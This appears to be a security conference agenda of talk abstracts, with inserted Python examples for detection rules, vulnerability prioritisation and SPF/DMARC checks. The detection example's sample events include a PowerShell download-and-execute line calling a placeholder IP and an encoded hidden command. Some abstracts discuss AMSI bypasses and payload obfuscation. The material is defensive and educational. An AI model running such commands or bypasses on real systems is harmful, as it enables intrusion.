SecOps Forum will focus on integrating cybersecurity operations (SecOps), highlighting real-time threat monitoring, incident response, and the use of automation tools to boost operational efficiency.
Vulnerability scanning has been a staple in cybersecurity for over two decades. Despite its long-standing presence, many organizations still struggle with effectively conducting scans, assessing discovered vulnerabilities, and prioritizing remediation efforts. Furthermore, the emergence of new security products — such as Breach and Attack Simulation (BAS) and External Attack Surface Management (EASM) — has added another layer of complexity, leaving businesses uncertain about whether to invest in these tools and how to maximize their effectiveness.
With limited resources, organizations face the ongoing challenge of deciding which cybersecurity products and services to prioritize. A poor selection wastes budget, while improper deployment keeps organizations from realizing the full value of their investments. Drawing on our experience from more than 100 Red Team engagements, this talk will explore the best use cases for various security tools in real-world scenarios and show how combining these tools with a Red Team assessment can serve as an effective Proof of Concept (PoC) for evaluating their true impact.
Security issues with Active Directory have been discussed for many years. It's been 18 years since the "Pass The Hash" attack technique emerged. Have we really eliminated these security issues? For example, Microsoft has begun phasing out NTLM authentication starting with Windows 11 24H2, but does that mean Kerberos cannot be attacked? As enterprise architectures gradually shift toward hybrid identity authentication (such as Entra ID and SAML), these weaknesses appear to be merging into a larger attack surface.
In this session, we will review the history of Active Directory attacks over the years and introduce the related techniques. We will explore the attack methods that arise at the intersection of on-premises AD and Azure/Entra ID hybrid identity authentication. Using simple, accessible concepts, we aim to help everyone quickly understand these potential vulnerabilities and attack vectors, and to provide a more comprehensive picture of these weaknesses so that the related risks can be managed within the enterprise.
Enterprise networks are highly heterogeneous, with diverse architectures, operating systems, and applications, and they face increasingly complex and fast-changing threats. This diversity makes a single detection logic hard to apply everywhere. Detection Engineering has emerged as a crucial discipline: through systematic methods, it enables the design of flexible detection rules tailored to specific environments. By abstracting attack behaviors into characteristic patterns rather than matching fixed indicators, this approach stays adaptable to rapid change. This presentation explores the core concepts and practices of Detection Engineering, demonstrated with real-world cases. We'll also discuss using frameworks like MITRE ATT&CK to deconstruct attack behaviors and locate potential detection points.
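As an added illustration of the approach described above (this is example code, not material from the talk), the following Python sketch abstracts three attack behaviours into rules, tags each with the ATT&CK technique it covers, and runs them over process-creation events. The event fields, the regexes, the technique mapping and the sample events are all assumptions chosen for the example.

```python
"""Detection-engineering sketch: attack behaviours abstracted into rules,
each tagged with the MITRE ATT&CK technique it covers, run over process
creation events. Added example; event fields, rule logic and sample
events are assumptions, not material from the talk."""
import re
from dataclasses import dataclass
from typing import Callable


@dataclass
class Event:
    """Minimal process-creation event (Sysmon Event ID 1 style fields)."""
    image: str          # full path of the new process
    parent_image: str   # full path of the parent process
    command_line: str
    user: str


@dataclass
class Rule:
    name: str
    technique: str                     # ATT&CK technique ID
    predicate: Callable[[Event], bool]
    severity: str = "medium"


def basename(path: str) -> str:
    """Last path component, lower-cased, so rules ignore install location."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}

# Behaviour patterns, not indicators: any Base64 blob after an -enc switch,
# any download verb followed by a URL, whatever the actual payload is.
ENCODED_CMD = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|enco|encodedcommand)\s+[A-Za-z0-9+/=]{20,}")
DOWNLOAD = re.compile(r"(?i)(?:downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b).*\bhttps?://")

RULES = [
    Rule("Office application spawning a script host", "T1566.001",
         lambda e: basename(e.parent_image) in OFFICE_APPS
         and basename(e.image) in SCRIPT_HOSTS, "high"),
    Rule("PowerShell launched with an encoded command", "T1059.001",
         lambda e: basename(e.image) in {"powershell.exe", "pwsh.exe"}
         and bool(ENCODED_CMD.search(e.command_line))),
    Rule("Script host fetching content from the Internet", "T1105",
         lambda e: basename(e.image) in SCRIPT_HOSTS
         and bool(DOWNLOAD.search(e.command_line))),
]


def run_rules(events, rules=RULES):
    """Return one (rule name, technique, severity, event) tuple per match."""
    hits = []
    for ev in events:
        for rule in rules:
            if rule.predicate(ev):
                hits.append((rule.name, rule.technique, rule.severity, ev))
    return hits


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    Event(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
          "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
          r"CORP\alice"),
    Event(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r"C:\Windows\explorer.exe",
          r"powershell.exe -File C:\scripts\backup.ps1",
          r"CORP\bob"),
    Event(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          r"C:\Windows\System32\cmd.exe",
          "powershell -c \"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/p.ps1')\"",
          r"CORP\svc-backup"),
]

if __name__ == "__main__":
    for name, technique, severity, ev in run_rules(SAMPLE_EVENTS):
        print(f"[{severity}] {technique} {name}: {ev.user} {ev.command_line}")
```

The point of the design is that each rule keys on a relationship (parent/child, switch/argument shape, verb/URL) rather than on a hash or a specific domain, so the same rules keep firing when the payload, the C2 host or the installation path changes; the ATT&CK tag on each rule is what lets coverage be reviewed against the framework.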
This talk will be based on TeamT5's extensive experience in providing Managed Detection and Response (MDR) services, exploring the challenges and pain points encountered during the threat hunting process. Through real-world case studies, we will discuss the obstacles faced in live environments and how threat hunting techniques can be leveraged to detect traces of Advanced Persistent Threat (APT) groups, especially in response to their evolving attack strategies.
This session analyzes, from a Blue Team perspective and using real case studies, the cybersecurity risks enterprises face when managing both cloud and on-premises environments. It explores potential improvements based on relevant security frameworks and uses the Cyber Defense Matrix (CDM) to assess applicable measures at each stage. Real incidents are aligned with the CDM framework to illustrate actionable steps, helping security managers explore the different aspects of hybrid cloud security governance.
Cybersecurity administrators are always busy, and it's only getting busier! In today's digital age, companies face increasing cybersecurity threats, making vulnerability management essential. From traditional IT maintenance onward, and leveraging the solutions you already have, here is how to enhance overall security:
Regular Scanning and Assessment: Continuously perform vulnerability scans and risk assessments to identify and remediate weaknesses as soon as they appear.
Prioritize Critical Vulnerabilities: Rank findings by severity and by their impact on the business, focusing resources on fixing high-risk vulnerabilities first.
Use Automated Tools: Apply automation to improve the efficiency of vulnerability detection and remediation and to reduce human error.
By applying these practices, tailored to your industry, you can manage vulnerabilities effectively, enhance overall security, and protect critical assets from cyber threats.
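The prioritization step above is where most programs go wrong, because the scanner's CVSS score alone does not say which finding to fix first. The following Python example (added here, not the presenter's method) ranks constructed scanner findings by combining CVSS with exposure, asset criticality and known exploitation; the weights, the SLA tiers and the findings themselves are assumptions chosen for the example.

```python
"""Risk-based prioritisation of scanner findings: CVSS alone is not the
ranking; exposure, asset criticality and known exploitation are. Added
example; the weighting scheme, SLA tiers and the findings are assumptions,
not the presenter's method."""
from dataclasses import dataclass


@dataclass
class Finding:
    host: str
    vuln_id: str            # scanner or CVE identifier (placeholders here)
    cvss: float             # CVSS base score, 0.0-10.0
    internet_facing: bool   # from the asset inventory / EASM
    asset_criticality: int  # 1 (lab box) .. 5 (crown jewel), from the CMDB
    exploited_in_wild: bool # e.g. listed in CISA KEV
    public_exploit: bool    # working exploit code publicly available


def risk_score(f: Finding) -> float:
    """Scale CVSS by business impact and exploitability (assumed weights)."""
    score = f.cvss * (f.asset_criticality / 5)
    if f.internet_facing:
        score *= 1.5
    if f.exploited_in_wild:
        score *= 2.0
    elif f.public_exploit:
        score *= 1.3
    return round(score, 2)


def sla_days(score: float) -> int:
    """Remediation deadline tier (assumed policy values)."""
    if score >= 15:
        return 7
    if score >= 8:
        return 30
    return 90


def prioritise(findings):
    """Findings sorted highest risk first, each with its score and SLA."""
    ranked = []
    for f in findings:
        score = risk_score(f)
        ranked.append((score, sla_days(score), f))
    ranked.sort(key=lambda t: t[0], reverse=True)
    return ranked


# Constructed sample findings with placeholder identifiers.
SAMPLE_FINDINGS = [
    Finding("web01", "VULN-A", 9.8, True, 4, True, True),
    Finding("db01", "VULN-B", 9.8, False, 5, False, False),
    Finding("kiosk07", "VULN-C", 7.5, False, 1, False, True),
    Finding("vpn01", "VULN-D", 6.5, True, 5, True, True),
]

if __name__ == "__main__":
    for score, days, f in prioritise(SAMPLE_FINDINGS):
        print(f"{score:6.2f}  fix within {days:3d} days  {f.host:8s} {f.vuln_id} (CVSS {f.cvss})")
```

Note the outcome on the sample data: the CVSS 6.5 finding on the exposed, actively exploited VPN gateway outranks the CVSS 9.8 finding on an internal database with no known exploit. Whatever weights you choose, the inputs (exposure, criticality, exploitation status) have to come from inventory and threat intelligence sources that are kept current, or the ranking degrades back to plain CVSS.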
In this presentation, I will share with the audience the process and significance of applying for membership in FIRST (Forum of Incident Response and Security Teams). As global information security threats become increasingly severe, ASUS is committed to providing secure and reliable products and services to our global users and partners.
Throughout this session, I will explain how to use the SIM3 v2 interim Self-Assessment Tool to conduct a comprehensive self-evaluation, in order to fully understand the maturity of our CSIRT/PSIRT and devise improvement plans. I will also discuss how we identified suitable sponsors for recommendations and on-site visits, ensuring the completeness of the membership application materials. Additionally, I will detail the process of filling out the FIRST Membership Interest Form and the New Full Member Team Application, from expressing interest to formally submitting the application, ensuring each step is carried out smoothly.
Finally, I will share our experience after joining FIRST as a member, including leveraging the FIRST MISP threat intelligence platform, participating in Special Interest Groups (SIGs), and attending FIRST events. These resources and opportunities will greatly enhance our response capabilities and professional growth. Through this sharing, I hope to help everyone better understand the significance and process of joining FIRST.
In today's rapidly evolving digital landscape, High-Performance Computing (HPC) has become a core technology across various fields, from scientific research to financial analysis, all relying on its powerful computational capabilities. However, with technological advancements, security threats have also grown increasingly complex, highlighting the importance of a thorough examination of the security of HPC environments. This presentation will focus on the NIST SP 800-223 standard, providing an in-depth analysis of the security architecture, threat assessment, and security posture of high-performance computing. The talk will cover the background of NIST SP 800-223 and its significance in HPC security, followed by a discussion on how to establish a robust security architecture to guard against various potential threats. Subsequently, we will delve into the major security threats currently facing HPC environments, including the characteristics and impacts of both internal and external attacks, and offer effective countermeasures. Additionally, the presentation will emphasize the concept of security posture, exploring how organizations can assess and enhance their protective capabilities within high-performance computing.
This session will present CHT Security's 2024 cybersecurity incident handling statistics, using significant cases as examples to analyze the challenges enterprises face. It will also emphasize key protection points such as network perimeter defense, intranet protection, and personnel security training, and discuss the importance of vulnerability management and supply chain risk.
The main topic is an introduction to SRM, our cybersecurity monitoring and response platform. This part demonstrates how integrating SRM with SOC, MDR, and SOAR accelerates response, strengthens defense in depth, and reduces cybersecurity risk. Finally, it offers enterprises recommended solutions for addressing cybersecurity challenges, drawn from practical cases and best practices.
Email services are a critical part of an organization's daily operations, which makes them a frequent target for phishing and email spoofing. Various security mechanisms exist to mitigate these risks, but their complexity often leads to misconfiguration. Moreover, because mail keeps flowing without them, these mechanisms are easily overlooked, leaving systems exposed.
This talk will provide a comprehensive exploration of email security mechanisms, examining their intended use, common configuration mistakes, the gap between practical implementation and RFC standards, and the future of these mechanisms. We will focus on preventing spoofing attacks and enhancing the security of email transmission. Finally, by analyzing real-world cases, we will offer practical recommendations to help effectively address these challenges.
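The mechanisms a talk like this covers are the DNS-published records that let receivers verify a sender's domain, SPF (RFC 7208) and DMARC (RFC 7489), alongside DKIM signing. As an added example (not material from the talk), the Python below runs a handful of static checks over an SPF and a DMARC record and shows a weak record beside its corrected form; the records are constructed for example.com, and the check list is a subset of what a full validator (which would also resolve the includes) performs.

```python
"""Static checks for the two DNS-published anti-spoofing records, SPF
(RFC 7208) and DMARC (RFC 7489): a weak record beside a corrected one.
Added example, not material from the talk; the records are constructed
for example.com and the checks are a subset of a full validator's."""

# SPF terms that cost a DNS lookup; RFC 7208 section 4.6.4 caps these at 10.
LOOKUP_TERMS = {"include", "a", "mx", "ptr", "exists", "redirect"}


def check_spf(record: str) -> list:
    """Return a list of problems found in an SPF TXT record."""
    issues = []
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        return ["record must start with v=spf1"]
    lookups = 0
    all_qualifier = None
    for term in terms[1:]:
        t = term.lower()
        if "=" in t:                       # modifier: redirect=, exp=
            if t.split("=", 1)[0] in LOOKUP_TERMS:
                lookups += 1
            continue
        qualifier = "+"                    # default qualifier is pass
        if t[0] in "+-~?":
            qualifier, t = t[0], t[1:]
        mech = t.split(":", 1)[0].split("/", 1)[0]
        if mech in LOOKUP_TERMS:
            lookups += 1
        if mech == "ptr":
            issues.append("ptr mechanism is slow and unreliable; RFC 7208 section 5.5 says it should not be used")
        if mech == "all":
            all_qualifier = qualifier
    if all_qualifier is None:
        issues.append("no 'all' term, so unlisted senders get a neutral result")
    elif all_qualifier in "+?":
        issues.append(f"'{all_qualifier}all' lets any sender pass; use -all (or ~all while testing)")
    if lookups > 10:
        issues.append(f"{lookups} lookup terms exceed the limit of 10; receivers return permerror")
    return issues


def check_dmarc(record: str) -> list:
    """Return a list of problems found in a DMARC TXT record."""
    parts = [p.strip() for p in record.split(";") if p.strip()]
    if not parts or parts[0].lower() != "v=dmarc1":
        return ["record must start with v=DMARC1"]
    tags = {}
    for part in parts[1:]:
        if "=" in part:
            k, v = part.split("=", 1)
            tags[k.strip().lower()] = v.strip()
    issues = []
    policy = tags.get("p", "").lower()
    if not policy:
        issues.append("required p= tag is missing")
    elif policy == "none":
        issues.append("p=none only monitors; spoofed mail is still delivered")
    if "rua" not in tags:
        issues.append("no rua= address, so aggregate reports are never received")
    pct = tags.get("pct", "100")
    if pct.isdigit() and int(pct) < 100:
        issues.append(f"pct={pct} applies the policy to only part of failing mail")
    if tags.get("sp", "").lower() == "none" and policy in ("quarantine", "reject"):
        issues.append("sp=none leaves subdomains unprotected")
    return issues


# Constructed records for example.com (not a real zone).
WEAK_SPF = ("v=spf1 a mx ptr include:a.example include:b.example include:c.example "
            "include:d.example include:e.example include:f.example include:g.example "
            "include:h.example +all")
FIXED_SPF = "v=spf1 ip4:203.0.113.0/24 include:_spf.example.net -all"
WEAK_DMARC = "v=DMARC1; p=none; pct=50"
FIXED_DMARC = "v=DMARC1; p=reject; rua=mailto:dmarc@example.com; adkim=s; aspf=s"

if __name__ == "__main__":
    for label, rec, fn in [("weak SPF", WEAK_SPF, check_spf), ("fixed SPF", FIXED_SPF, check_spf),
                           ("weak DMARC", WEAK_DMARC, check_dmarc), ("fixed DMARC", FIXED_DMARC, check_dmarc)]:
        print(label, "->", fn(rec) or "OK")
```

The weak SPF record illustrates two of the misconfigurations the abstract refers to: "+all" makes the record pass every sender, and eleven lookup-bearing terms push it over the RFC limit, so receivers return permerror and effectively ignore it. The weak DMARC record is the common "deployed but never enforced" state: p=none with no reporting address means the domain owner is neither blocking spoofed mail nor learning who is sending it.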
As threats continue to intensify, threat actors employ increasingly stealthy infection techniques to obtain reverse shells and move laterally within corporate networks. Among these, fileless attack strategies have become a primary method for bypassing even the most advanced endpoint defenses. By abusing native system components such as PowerShell and other LOLBins (living-off-the-land binaries) in orchestrated attacks, adversaries can escalate privileges, use BYOVD (Bring Your Own Vulnerable Driver) techniques to disable core endpoint protections, and implant persistent backdoors.
To counter this layered abuse of native services, Microsoft introduced AMSI (Antimalware Scan Interface) in Windows 10 and integrated it into several high-risk execution paths, including PowerShell and the Windows Script Host. AMSI hands de-obfuscated script content to the registered antimalware provider at execution time, giving a more precise, semantic scan than file-based inspection, and it has become the main line of defense against early-stage threats. ... But is it really effective?
In this session, we will begin with a paper from CrowdStrike that raises concerns about the AMSI architecture design. We will guide the audience through a reverse-engineering approach to break down the PowerShell + AMSI defense framework, exploring The Good, The Bad, and The Ugly. This involves analyzing how PowerShell's architectural components interact with each other and with AMSI, and showing how that understanding turns into the practical, effective bypass techniques seen in the wild. On the detection side, we will examine whether multi-layered hooks can mitigate these bypass techniques, helping blue team members gain a deeper understanding of the PowerShell engine.
This session will delve into the configuration and application of Microsoft security products, covering multiple platforms such as Defender, Intune, and Entra ID. We will provide detailed explanations on how to effectively configure and utilize these platforms to protect enterprises from common cyber threats and enhance overall cybersecurity resilience.
We will also share past attack cases, illustrating how Microsoft products and third-party tools can be leveraged for defense and investigation. For instance, enterprises often face phishing emails impersonating senior executives or multi-layer redirection phishing attacks exploiting open redirects on well-known websites. In these cases, we will analyze how Microsoft products perform in defending against such attacks, discussing their advantages, such as high integration and robust threat detection capabilities, while also acknowledging their shortcomings, including operational complexity and limited configuration flexibility.
PowerShell is a good tool for administering your Windows machine, and it's good for malicious actors as well. Malicious actors often use PowerShell to launch both local and remote payloads, and usually want their code to execute without being detected, which is where obfuscation comes in. In this session, I will discuss how to use the invocation expression (Invoke-Expression) to launch a malicious payload and how to obfuscate that invocation.
This guide delves into how red team exercises can effectively enhance the defensive capabilities of the blue team, fostering a more resilient security framework. Red team exercises are not just about testing defenses but also serve as a crucial mechanism for uncovering potential weaknesses within the organization.
The discussion will cover the core processes and techniques of red team exercises, including simulated attack methods for initial access, privilege escalation, and lateral movement, along with demonstrations of common attack scenarios observed in real-world engagements.
Additionally, the guide will explore how to integrate red team exercise results into an organization’s security culture, leveraging cross-departmental collaboration and security awareness initiatives to build a continuously improving defense system.
Microsoft Graph API is a powerful tool that lets users streamline workflows quickly, repeatably, and automatically. However, the same capabilities make it a valuable asset for attackers once they obtain a valid account or token.
In this session, we will explore the capabilities of Microsoft Graph API and demonstrate how attackers leverage these features at various stages of an intrusion. Additionally, we will introduce GraphRunner, a PowerShell toolset commonly used by attackers, and explain how it helps them operate inside a victim's tenant to achieve their objectives.
Finally, we will discuss methods for detecting and identifying malicious use of Microsoft Graph API, as well as strategies to prevent such attacks.